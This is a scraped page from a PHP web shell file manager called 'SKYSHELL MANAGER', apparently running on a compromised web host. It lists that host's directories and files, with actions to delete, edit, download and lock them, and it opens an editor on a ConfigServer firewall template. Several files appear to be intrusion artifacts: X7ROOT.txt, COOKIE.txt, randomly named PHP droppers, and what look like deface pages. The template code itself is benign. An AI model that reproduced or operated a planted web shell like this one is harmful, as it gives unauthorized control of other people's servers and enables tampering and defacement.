📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: csf.tmpl
[% USE Whostmgr; # The jquery that's loaded by default is straight up broken, and you can't # just pass it into scripts and get it to work. As such just jam it in. SET JQUERY = Whostmgr.find_file_url('libraries/jquery/current/jquery.min.js'); # Also, this uses JQuery UI, but never loaded it??? Maybe it was bundled before? SET JQ_UI = Whostmgr.find_file_url('libraries/jquery-ui/current/jquery-ui.min.js'); # Bootstrap JS is needed for tabs and toggle buttons SET BOOTSTRAP_JS = Whostmgr.find_file_url('libraries/bootstrap/optimized/js/bootstrap.js'); WRAPPER 'master_templates/master.tmpl' header = 'ConfigServer Security & Firewall', hide_license_warnings = 1, stylesheets=[ Whostmgr.find_file_url('3rdparty/bootstrap-rtl/optimized/dist/css/bootstrap-rtl.min.css'), Whostmgr.find_file_url('libraries/jquery-ui/current/jquery-ui.min.css'), ], theme='bootstrap', breadcrumburl='/cgi/configserver/csf.cgi', %] <script type="text/javascript" src="[% JQUERY %]"></script> <script type="text/javascript" src="[% JQ_UI %]"></script> <script type="text/javascript" src="[% BOOTSTRAP_JS %]"></script> [% csf_output %] <script type="text/javascript"> function getCookie(cname) { var name = cname + "="; var ca = document.cookie.split(';'); for(var i = 0; i <ca.length; i++) { var c = ca[i]; while (c.charAt(0)==' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length,c.length); } } return ""; } $(document).ready(function() { $("#loader").hide(); $("#docs-link").hide(); $.fn.scrollBottom = function() { return $(document).height() - this.scrollTop() - this.height(); }; $('#botlink').on("click",function(){ $('html,body').animate({ scrollTop: 0 }, 'slow', function () {}); }); $('#toplink').on("click",function() { var window_height = $(window).height(); var document_height = $(document).height(); $('html,body').animate({ scrollTop: window_height + document_height }, 'slow', function () {}); }); $('[data-tooltip="tooltip"]').tooltip(); $(window).scroll(function () { if ($(this).scrollTop() > 500) { $('#botlink').fadeIn(); } else { $('#botlink').fadeOut(); } if ($(this).scrollBottom() > 500) { $('#toplink').fadeIn(); } else { $('#toplink').fadeOut(); } }); [% IF config.STYLE_MOBILE || reseller %] var csfview = getCookie('csfview'); if (csfview == 'mobile') { $(".mobilecontainer").css('display','block'); $(".normalcontainer").css('display','none'); $("#csfreturn").addClass('btn-primary btn-lg btn-block').removeClass('btn-default'); } else if (csfview == 'desktop') { $(".mobilecontainer").css('display','none'); $(".normalcontainer").css('display','block'); $("#csfreturn").removeClass('btn-primary btn-lg btn-block').addClass('btn-default'); } if (top.location == location) { $("#cpframetr2").show(); } else { $("#cpframetr2").hide(); } if ($(".mobilecontainer").css('display') == 'block' ) { document.cookie = "csfview=mobile; path=/"; if (top.location != location) { top.location.href = document.location.href ; } } $(window).resize(function() { if ($(".mobilecontainer").css('display') == 'block' ) { document.cookie = "csfview=mobile; path=/"; if (top.location != location) { top.location.href = document.location.href ; } } }); $("#NormalView").click(function(){ document.cookie = "csfview=desktop; path=/"; $(".mobilecontainer").css('display','none'); $(".normalcontainer").css('display','block'); }); $("#MobileView").click(function(){ document.cookie = "csfview=mobile; path=/"; if (top.location == location) { $(".normalcontainer").css('display','none'); $(".mobilecontainer").css('display','block'); } else { top.location.href = document.location.href; } }); [% END %] }); </script> [% END %]
Save